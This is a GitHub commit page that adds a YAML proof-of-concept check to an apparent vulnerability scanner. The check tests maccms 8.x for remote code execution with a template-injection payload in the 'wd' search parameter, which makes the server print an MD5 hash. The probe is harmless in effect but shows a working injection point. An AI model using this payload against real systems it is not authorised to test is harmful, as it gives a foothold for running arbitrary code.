Skip to content

Commit

Permalink
maccms-rce (chaitin#611)
Browse files Browse the repository at this point in the history
  • Loading branch information
hanxiansheng26 authored and virusdefender committed Dec 26, 2019
1 parent 6cdc33f commit 3dd4790
Showing 1 changed file with 14 additions and 0 deletions.
14 changes: 14 additions & 0 deletions pocs/maccms-rce.yml
Original file line number Diff line number Diff line change
@@ -0,0 +1,14 @@
name: poc-yaml-maccms-rce
set:
r: randomInt(800000000, 1000000000)
rules:
- method: GET
path: /index.php?m=vod-search&wd={if-A:printf(md5({{r}}))}{endif-A}
follow_redirects: false
expression: |
response.body.bcontains(bytes(md5(string(r))))
detail:
Affected Version: "maccms8.x"
author: hanxiansheng26(https://github.com/hanxiansheng26)
links:
- https://www.cnblogs.com/test404/p/7397755.html

0 comments on commit 3dd4790

Please sign in to comment.